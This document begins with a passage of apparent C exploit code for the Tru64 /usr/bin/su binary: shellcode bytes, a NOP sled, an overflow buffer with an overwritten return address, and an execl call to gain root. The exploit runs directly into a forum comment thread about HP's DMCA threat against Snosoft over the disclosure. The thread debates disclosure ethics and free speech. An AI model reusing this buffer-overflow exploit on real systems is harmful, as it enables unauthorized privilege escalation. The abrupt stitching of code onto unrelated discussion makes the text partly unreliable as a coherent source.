"\x11\x14\xe3\x43" "\x20\x35\x20\x42" "\xff\xff\xff\xff" "\x30\x15\xd9\x43" "\x31\x15\xd8\x43" "\x12\x04\xff\x47" "\x40\xff\x1e\xb6" "\x48\xff\xfe\xb7" "\x98\xff\x7f\x26" "\xd0\x8c\x73\x22" "\x13\x05\xf3\x47" "\x3c\xff\x7e\xb2" "\x69\x6e\x7f\x26" "\x2f\x62\x73\x22" "\x38\xff\x7e\xb2" "\x13\x94\xe7\x43" "\x20\x35\x60\x42" "\xff\xff\xff\xff";

main(int argc, char *argv[]) {
int i, j;
char buffer[8239];
char payload[15200];
char nop[] = "\x1f\x04\xff\x47";

bzero(&buffer, 8239);
bzero(&payload, 15200);

for (i=0;i<8233;i++)
buffer[i] = 0x41;

/* 0x140010401 */

buffer[i++] = 0x01;
buffer[i++] = 0x04;
buffer[i++] = 0x01;
buffer[i++] = 0x40;
buffer[i++] = 0x01;

for (i=0;i<15000;) {
for(j=0;j<4;j++) {
payload[i++] = nop[j];
}
}

for (i=i,j=0;j<sizeof(shellcode);i++,j++)
payload[i] = shellcode[j];

printf("/bin/su by phased\n");
printf("payload %db\n", strlen(payload));
printf("buffer %db\n", strlen(buffer));

execl("/usr/bin/su", "su", buffer, payload, 0);

}

Fruit Of The Poison Tree

[tlambert]

"What difference does it make who finds and reports a bug?"

We lost a great deal of medical knowledge after WWII when we threw out the data gathered by Dr. Josef Mengele. This medical knowledge was the result of human experimentation on prisoners; some of it will remain lost until someone repeats the unethical human experiments involved.

So in answer: it has *always* mattered what source information; the ends never justify the means.

"The cool thing about the Internet is that you don't have to be a professor at MIT to publish security exploits. The publications speaks for itself."

In this case, it did not. It spoke for a security consulting company, where the publisher of the exploit was a principal. If the exploit had merely spoken for itself, then we wouldn't be having this discussion, because HP would not have had a name to which it could attach their threat of a lawsuit.

The ends in this case were not even knowledge: they were commercial gain. Knowledge was just a side effect of the process of obtaining the commercial gain. If the commercial gain could have been obtained without the exposure of the security flaw, then there likely would not have been an exposure at all.

Am I gald the vulnerability was exposed? Yes.

Do I think HP is playing CYA? Yes.

Do I think the person who exposed the vulnerability acted ethically, as I would expect a legitimate security researcher to act? No.

-- Terry

Re:Fruit Of The Poison Tree

[richieb]

So in answer: it has *always* mattered what source information; the ends never justify the means.

Hmmm. Good point.

Do I think the person who exposed the vulnerability acted ethically, as I would expect a legitimate security researcher to act? N

Hmm. Not as clear. Commercial gain is not as bad a reason, especially since the problem has been known to HP for a long time. Plus the gain is very indirect: building reputation, rather than direct payment.

DMCA / McCarthy-style accusations.

[oakbox]

Okay, what's to keep one company from slandering another company without any proof? What if Corp A announces that they have found a very destructive hole in Corp B's software, rendering it totally open to attack, but Corp A cannot release this information because of the DMCA.
Stay with me here: What if there is no vulnerability? Even if Corp B asks Corp A to do so, Corp A can (correctly) claim that they are not allowed to release the information under DMCA. Corp B can't find the vulnerability to fix it. Corp B cannot effectively defend its reputation because the exact charges are not known.
- oakbox

Security Through...

[mindriot]

nice... the old, infamous method of Security through Obscurity has been replaced with a new, much safer one -- Security through DMCA. Way to go!

HP isn't the only one who can sue Snosoft

[Sloppy]

It wasn't the inventor of the CSS "technology" that sued 2600; it was the holder of the copyrighted works that are protected by CSS (MPAA). (There was a DVDCCA case, but that's a separate issue.)

Anyone who stores copyrighted material on a Tru64 system, and is counting on the system as a technological measure to control access to their work, can sue Snosoft for violating DMCA.

Alan Cox wasn't worried about Linus or someone else on the kernel team suing him. It's the millions of other people who use Linux, that he can't afford to trust.

So even if HP backs down, Snosoft's people aren't necessarily out of the woods. Realistically, they probably are. But they can't be 100% sure. That's how bad this law is.

Re:The EU

[Lemmy+Caution]

As long as what you say doesn't jeopardize national security, suggest an interest in terrorism, reveal trade secrets, infringe on copyrights, trademarks, or patents, isn't a description of sexual activities involving anyone under the age of majority, isn't disruptive, doesn't explain how to circumvent copyright, doesn't explain how to acquire or use drugs, isn't seditious, doesn't reveal trade secrets, doesn't threaten our vital national unity during this ongoing and arduous war against terrorism, and is otherwise relatively inoffensive, you can say almost anything you like in the US.

I think if HP knew how much this is going to cost

[ajv]

I recommend on about $2-5m IT purchases a year. If we all tell Carly (in nice positive ways) how much this stupid decision is going to cost them, they'll hopefully see the light, and give up. This is a shame, as I've personally been a HP owner since 1995 and had exemplerary service from them for the longest time. Compaq on the other hand has been busy screwing customers of mine since 1990. Their "service" was and always has been a joke where I live. When we paid a large wad of cash in 1997 for a bunch of Digital gear, well, Compaq bought them. I knew then we had signed a multi-million dollar mistake.

But I have no doubt now that they've threatened a lawsuit, a lawsuit we will have. Hopefully, it'll clear up the boundaries of the awful DCMA.

Anyway, HP, here's my "fuck you":

1997: $4,000,000 (at least - a huge deal)
1998: $1,000,000 (mostly desktops, changed from CPQ to HP cos I liked HP)
1999: $4,500,000 (start of a nice juicy project)
2000: $7,500,000 (the tail end of nice juicy project)
2001: a tiny bit less than $2,000,000
2002: $3,500,000 (so far)
2003: ?
2004: ?
2005: ?
2006: ?
2007: ?
2008: ?
2009: ?
2010: ?
2011: ?
2012: ? ....
2035: ?
2036: I retire.

Remember, HP, good friends are hard to come by, enemies are forever.

Andrew

Re:Apache (no one really cares about free-speech)

[Max+von+H.]

Probably because the EU has no "First Amendment"

We may not have it, but we have the European Court of Human Rights, which can be seized by any citizen (EU or not) and have his/her rights enforced. This court just sticks to the Declaration of Human Rights, which include free speech and plenty of other goodies absent from the US constitution. Even nazi sh*ts are granted rights their countries denied them on behalf of "hate speech" laws and such.

I also believe we, Europeans, enjoy a pretty nice form of freedom, perhaps even more than the citizens of the USofA. At least I don't risk much being shot by a gun-toting neighbour who thinks I'm a terrorist because I speak a foreign language of have friends from diverse ethnic backgrounds.

It's about time you Americans stop thinking Europe is some sort of communist dictatorship... Because from here, the USA sure don't look like the place to be if one wants to be free!

Just my 0.02

-max

Translation

[Observer]

HP doesn't have the people and resources to fix a potentially serious bug, but it does have the people and resources to claim copyright protection on it.

True, this is on a product that the company undoubtedly wants to retire as soon as possible, but the message this is sending about its priorities goes considerably wider.

HP is wrong; but hacker was irresponsible

[matthew_gream]

I think HP is wrong with its DMCA style threats, because they are not appropriate. However, I can sympathise with HP and understand why they may have "lashed out". I think the hacker in question was wrong to irresponsibly post the exploit for script kiddies to start playing with fire. For all the debate about various sorts of disclosure processes, it's quite clear that this approach potentially has a high impact upon any deployed systems and gives no time for either the vendors or the administrators to take action. This is just not a responsible real-world approach to dealing with security issues.

Re:HP is wrong; but hacker was irresponsible

[TeddyR]

The problem is that this gives a rise to the other question... How long to wait before making something public?

The person that made the information public knew that HP has had the information SEVERAL MONTHS before making the exploit public.

Its true that it may have been better to contact CERT first (note: HP already knew); post to bugtraq, but DESCRIBE the issue and not post the exploit... THEN once the PUBLIC description is made {and still no response from HP} [I say maybe give HP 14 working days] only then post the exploit as as done..

Could go two ways

[GregWebb]

Could be, I agree, but I'd read that as 'full disclosure unless you'd hired us to perform a private audit', which is rather more reasonable.

That just makes Tru64 less ttrustworthy...

[TeddyR]

By doing this HP has just made sure that anyone that finds a real security flaw in their operating system will not publicise the issue. This security through obscurity has been shown to be useless... Even Microsoft now realizes this.

If the item is not fixed when it is first found, and made public then this means that those flaws can easily stay hidden, and propagate into other subsystems in such a ay that fixing it at a later date may become impossible.

If the problem is not made public, there is a very good chance that real "black hat" underground distributers of the information may have and use the exploits. This could mean that real system admins are kept in the dark while their boxen are rooted from under them. This is because the admins are not made aware of the issues as a result of this action by HP.

As a result, I would much less be willing to use/trust a Tru64 / HP /CPQ machine since I have no idea if there are security problems that HP hindered from getting fixed.

Re:Why you must publish a working exploit.

[TeddyR]

Ah.. but once they say "it is only a theoretical vulnerability" the person that published the info can say... "Nope: here is the code"; or even better, can say in the initial publication "here is the description... and we have working code; which will be published in 14 days from now" and send the vendor the working code...

Even Microsoft has learned its lesson... {there is still space for improvement... but they are getting better in these situations]

Don't forget the first amendment

[leereyno]

Trying to dictate when someone is allowed to say something is in violation of the first amendment. If you live in a country where that doesn't apply then I guess it sucks to live there.

The real solution is for the vendors themselves to be more proactive and actually search for bugs and vulnerabilities. This isn't a perfect solution, because there is no such thing. Until such time that software is mathematically perfect there will always be bugs (in other words there will always be bugs). What companies like HP need are teams of programmers and legitimate crackers whose job it is to thrash the code as hard as possible to expose vulnerabilities before the criminal crackers find it. If they're too cheap to do this then fuck them and the horse they rode in on.

If you REALLY want to put an end to crap like the DMCA the very best things you can do are vote and donate money to groups like the EFF and ACLU. Put your money where your mouth is.

Lee

Re:Don't forget the first amendment

[Catbeller]

Did corporations even exist at the time the First Amendment was written?

Nope.

That's why corporations are not listed. I think that if Jefferson and the rest could see what new class of "citizen" has been created, they'd fire the first musket shot.

Corporations are not governments -- but they have more power and it seems, no responsibilities save those they voluntarily assume. Hell, they don't even feel responsible to the shareholders anymore.

Power without responsibilty == tyranny, however you slice it.

Re:Don't forget the first amendment

[leereyno]

I wasn't talking specifically about what HP is currently doing. Rather I was responding to the posters idea about how those who discover exploits should somehow be restrained from disclosing them for a set ammount of time. The only authority capable of enforcing such restraint would be the government, therefore the first amendment does definitely apply to the situation I was talking about.

Everyone is so quick to pipe in that the first amdendment only applies to the government. Well keep your britches on because it isn't that simple.

If you work for a company and part of your job is to keep your mouth shut about something, the fact that the company is requiring this of you as part of a private voluntary relationship (employee/employer) is not a violation of the first amendment. You are free to break off the relationship and save for non-disclosure agreements, in which you voluntarily contract yourself to remain silent, the company has no power to force you to be silent. Even the non-disclosure agreement is one in which it is the authority of the government that is imposing the silence, but one which you have voluntarily agreed to. It is a contract after all. Even servitude (slavery) is legal if it is voluntary.

If however a company is enlisting the help of the government to force someone to remain silent about something then the first amendment does definitely apply. The company is free to encourage the persn to be silent, refuse to have financial dealings with the person and so forth. What they don't have is the legal authority to demand silence.

What the DMCA has done is allow corporations to hijack the concept of copyright to nullify the first amendment in certain situations. It is therefore itself unconstitutional.

Lots of people like to blame big corporations for the DMCA. I don't. I blame congress and ultimately the american people for allowing it to be passed. If most of us were taking responsibility for our country by first and foremost voting, keeping abreast of current events and legislative shenanigans, and voicing our opinions to our elected representatives, things like the DMCA would never have a chance.

Democracy is the fairest of all governments because the people always get what they deserve. The DMCA is no exception.

Lee

Re:Don't forget the first amendment

[einhverfr]

Actualy, trying to dictate IF someone can say something is a violation of the first amendment. "When" falls under the time/place/manner restrictions. For instance, shouting your message at 110db (somehow) in the middle of town at 3AM is not protected speech.

Actually, trying to dictate IF someone can EXPRESS something is a violation of the 1st Amendment. Practical aspects of speach are not necessarily protected, according to the Supreme Court. In other words, if I understand the case law correctly, and IANAL, saying "President Bush is an idiot and a child pornographer" may be protected speach (being of political value) regardless of its truth, while saying the same thing about John Katz would be libel, and publishing detailed instructions of how to attempt to carry out an assassination attempt would almost certainly not be protected speach.

So posting DeCSS for download is probably unprotected, but wearing the source code printed on your shirt as a political statement is probably protected. So posting vulnerability information (how this vulnerability works) is in a gray area and publishing an exploit is probably not protected.

Re:The EU

[mpe]

DCMA is bad but at least at the core of our legal system we have a 1st amendment which prevents attempts at prior restraint,

The US Constitution is only as good as it's enforcement.

and so over the long term HP couldn't win this sort of thing.

Unless something were to happen quickly HP would win. Since they could afford to drag the case out. When it wants to the US government is capable of acting quickly. However they havn't done so in this case.

Thank you Sloppy!

[John+Harrison]

Now I finally understand WHY it is that HP thinks they can sue. I was honestly baffled.

Re:HP has a wonderful opportunity here actually

[alcmena]

I fully agree with you. There is a chance that HP really could make some good out of what happened here.

The realities of the situation as it stands...

[Svartalf]

I just wish people would stop believing that any company exists for the sole reason of increasing the wealth of its shareholders. It used to be that people believed in ethics -- that there are societal responsibilities that compete with shareholder equity. Of course it used to be that the primary purpose of a company was to produce something, which something would hopefully allow a profit.

You know it is possible -- and ethical! -- to not do something because it goes too far. Or is HP obligated to murder someone if it increases shareholder profit? And before you say, "Well, the law imposes too high a cost", answer me this: What if you could prove the legal sanction was less than the profit realized? Should HP kill the person? Must they?

You know, in many ways, you're right. In so very many ways, the original poster is also right.

There are companies out there that don't worry about things like increasing shareholder wealth- many of those are privately held companies. There are also a lot of companies that seem to be much more concerned with the short-term stock market valuations, etc. and will do anything to "improve" their valuations short-term, including mass-layoffs, cooking the books, screwing the people of an entire state over to make their bottom line look better, etc. While it's not 100% true, there IS a reason why a lot of people think that companies solely exist to increase shareholder wealth.

Answer of Mr. Ferson

[trizzer]

Well at least u get an anser if u write to him (could be an automatic reply tho cause his mailbox has been spammed by the /. crows ;)

--- schnipp ---

Dirk,

Appreciate your note and concern. Let me just start by saying, "don't
believe everything you read in the press :-)". I can assure you that my
primary interest and concern is for the Tru64 customers and that the
Tru64 engineering team is committed to finding and fixing any security
problem in the product and getting these fixes/notifications out to
customers ASAP. Trying to do everything possible for Tru64
customers is what motivates and brings me to work every day
(and night :-). We also encourage our customers and 3rd parties
that find security issues in the product to coordinate through the
CERT process, which has been set up to support both product
vendors and customers. Again, I appreciate your concern and
feedback.

Kent ...

-----Original Message-----
From: Dirk Lenneffer [mailto:*********.com]
Sent: Tuesday, July 30, 2002 11:42 PM
To: Ferson, Kent
Subject: TRUE64 exploit

dear mr. ferson,

instead of threatening the people who do YOUR work of finding bugs in
your product you should simply thank them, fix the bug and move along.
this last act of yours doesnt give us as customers great confidence in
your way of handling security related issues within your products.

best regards

--- schnapp ---

Well, maybe not the ACLU...

[El+Camino+SS]

The EFF I respect. I understand their issues, and the fact that we are totally under assault by corporations who want to chop up the digital world and sell it to us at as much as we can possibly afford to pay. Digital "Coal Towns" (look it up if you want to see some of America's greatest corporate crimes against humanity in the past).

As a member of the media, and a person that touches base with the ACLU every few weeks, I'll say that the ACLU is no longer interested in civil liberties, but more interested in legislating this society to a direction that they would prefer us to act. Trying to modify behavior through legislation is very different than protecting the right for us to act the way WE WANT TO ACT.

As of late, they seem to be only interested in anyone else but a person interested in computers. After talking with me several times face to face, the local rep of the ACLU has pretty much explained about their crusade against private Christian schools (please not the stressing of private) and their deemed "objectionable behavior" by those schools, and active interest in what goes on inside those schools. Those activities are rather curious for an organization like the ACLU, are they not?

After talkig to them about these subjects, I would never, EVER give them another dollar. They appear to represent the civil liberties of only SOME AMERICANS. OF COURSE, before I get slapped back, I would like to repeat this... imho, IMHO, IMHO!

So as a member in good standing of the /. crowd, I'd like to say lets stick to what we are specifically interested with on this board... and not give money to people who would love to "engineer through legislation" a power struggle at the expense of some Americans over other Americans.

This is a call to not listen to the ACLU. For computer issues, please stick your money to the EFF. The ACLU has gotten batty in its old age, and is trying to change the way we think, which the last time I checked, is a CIVIL LIBERTY.

Re:Well, maybe not the ACLU...

[ichimunki]

What a bizarre diatribe. All of the communications I've gotten from the ACLU centered on things like religious issues in *public* schools, library internet filtering, due process, equal protection, overall lessening of civil liberty through vehicles like USA-PATRIOT, and the drug war.

IN FACT: just last week the ACLU filed a lawsuit against the DMCA (http://www.aclu.org/news/2002/n072502a.html). So your criticism of their supposed inaction on this front is totally offbase. Sheesh!

That your rant got modded up is even further cause for alarm.

Re:HP has a wonderful opportunity here actually

[HiThere]

If they don't do something to redeem themselves, then I, personally, have had it with all HP and Compaq products. I won't trust a company that won't allow people to criticize it. And I am quite reluctant to ever trust a company that has ever threatened people who criticized it.

If they want to redeem themselves, they have three choices:
1) totally distance themselves from the cretin who issued that letter. He's a high manager, so this probably means firing for cause and without reccomendation. Management is supposed to be responsible for policy, and by keeping him, or even not punishing him harshly, they are continuing an association with that policy.

2) lead a crusade to dismantle the DMCA. You can make a case that a company must live within the current laws, but if you do you must accept the responsibility for the moral character of those laws. Considering HPs position at the top of several industries, they would need to take a major role in improving the laws... and not just for themselves!

3) come up with clear and convincing proof that that was the only way out of a situation that endangered ME without unacceptable costs. Proving that this was protection for themselves cuts no ice with me. If they want to say "we had to do ", then they had better be willing to show that it was for the common good of the community if they wish to be considered community members. Even then, it had better be a really good reason.

There may be another choice, but I sure don't see it.

I still assess Intel a 10% advantage penalty for their criminal prosecution of a sysadmin, and for their participation in a scheme involving encrypting the signals being transmitted to monitors. So far I haven't regretted choosing AMD, either. And I doubt that I'd regret choosing another company to buy my printers and ink from.

Re:Dear HP (The Real Thing)

[T3kno]

Yeah, I realized that after I looked at the preview on /. Oh well, hopefully she'll understand.

Re:HP has a wonderful opportunity here actually

[WNight]

Try Canon. They not only make good printers but they aren't dicks about ink. Their printers have seperate ink cartridges (well, their $60 model may not, but everything I've seen does) and they make it easy to refill them yourself.

This says a lot in the age of companies chipping their cartridges to prevent refilling, "for your own good." (And threatening to sue people who bypass, or describe how to bypass, the protection.)

Really, I'm too lazy to refill my own cartridges, but I won't *ever* go with someone who makes it impossible. It's a freedom thing. And this way there's a second source, if I ever need it.

I wrote Canon an email explain why all of my future purchases (and recommendations) would be for their products, based on their current policies.

Re:The EU

[Lemmy+Caution]

I'll admit I was being hyperbolic in the name of literary license, but the primary place I'll take issue with you here is your distinction between civil and criminal law. We don't live in states, we live in societies, and the fact that private parties can avail themselves of statutes which allow them to squelch the speech of others makes this a less free society, even though no constitutional violation has occurred.

The limitations on depictions of sex between minors was, of course, from legislation that hasn't passed, but we're one hysteria away from having that happen.

The 2600 case is a case in which just linking to a copyright-protection-violating description was prohibited. Again, the civil/criminal distinction is irrelevant from the perspective of the effect on free speech.

And as far as the drug-speech goes, check out HR the rider of HR833 (section 1701),making it a crime punishable by up to 10 years in federal prison to teach, demonstrate or distribute
information on the manufacture or use of illegal drugs.

Not above the law as long as the DMCA exists!

[sfgoth]

Today, top company exectutives seem to be above the law.

The HP VP droid who did this is not acting above the law. He is using the law exactly as intended!

We need to get the law removed, not convince a bunch of corporations that they shouldn't use it!

-pmb

Re:The EU

[Lemmy+Caution]

If you lose your livelihood, you've lost some freedom already. After all, it is a remedy in criminal cases as well that one be fined.

Essentially, you are relying on the justice system to defy the anti-freedom populist sentiment in the US. I don't think they will. The last decision of principle - roundly condemned by both parties and most of the press, yet the only reasonably constitutional decision that any objective judges could come to - was the "under God" decision by the 9th US court of appeals. The fact that it's going to be overturned by the SCOTUS will demonstrate that the judiciary is not going to protect the constitution any more.

Re:The EU

[Lemmy+Caution]

The first statement was a bon mot, not a serious analysis of freedom of speech in the US. It was attached to the ridiculous, almost meaningless and oft-recited cliche that the US is the freest society in the world (incarceration rates alone should at least problematize that claim). As far as the "under God" bit goes, though, I can't understand how any objective observer could see it as constitutional. It so clearly mandates a monotheistic doctrine, and makes that doctrine essential to national unity. (While students were excused from saying the pledge, teachers were not - which meant that a public institution was requiring them to lead the pledge, or lose their jobs. This is clearly a violation of the spirit of not allowing the state to respect the establishment of religion - and of course, just as at one time states may have established churches, states also violated the nature of the constitution by maintaining slavery for decades. That's irrelevant. And if those states had mandated compulsory membership in those state churches for employees, that too, I think, would be seen as explicitly unconstitutional.) Many of us who do advocate the ongoing separation between church and state are unhappy with the timing of the decision - it's not a battle that is best fought now, with patriotic fervor still at high levels, and it's a pyrrhic victory - but let's face it, the 9th Court of Appeals had the case in their docket and had to rule on it.

Re:The EU

[Lemmy+Caution]

You probably didn't know I'm of Peruvian origins when you wrote this, but I'll say this: in many ways, Peru *is* freer than the US. You actually have less de facto interference and hassle from a variety of perspectives, from speech to day-to-day running of business to how you dispense with your property to the use of substances. Of course, there's also poverty in Peru.

Economic freedom isn't even addressed in the constitution, really. The fact is that the 'economic freedom' as experienced in the US has more to do with the options that prosperity creates than with anything else.

And you did an unusual flip-flop. One one hand, you cite economic freedom as a demonstration of the relative freedom of the US, but farther up the thread you had said that the civil penalties against speech are not as significant as loss of freedom. One one hand you avail yourself of an economic argument for freedom, on the other you abandon that for a discursive/civil one.

Re:Did the hackers give HP fair notice?

[snosoft]

"http://www.netsys.com/cgi-bin/display_news_articl e.cgi?338"

On the matter of intent

[tlambert]

Intent is always a factor in any criminal or legal proceeding. Intent is very important in deciding a case, because intent determines the purpose for the act in question, rather than the result.

Considering only the ends means you ignore the means, and the means may in fact be unconcienable, or even reprehensible.

The indirectness of the gain is immaterial to the fact that the motivation was gain.

Gain is not a *bad* reason, but it's not a reason which renders the act defensible, from a legal or moral standpoint.

Motivation speaks to ethicality of the action. If the motivation was base, then that's very different than if it had been principled.

-- Terry

Of course they won't call you.

[Hektor_Troy]

When you go out of your way to call you, from Denmark no less, you do what everyone I talk to do ... "well, I haven't had time to take a shower today, and I want to do that" ...

Maybe it's just me ... ;-)

Re:as a Tru64 admin... [CONTINUED]

[Corgha]

bleh... hit submit instead of preview.

anyway, as I was saying:

The fact that they are threatening legal action implies two things: They see this as a real threat; they prefer to suppress word of vulnerabilities rather than fix them.

The latter is not the sort of response I want from a vendor. It's especially grating when, in the past few days, Debian and RedHat, for instance, have responded promptly to every issue posted on BugTraq.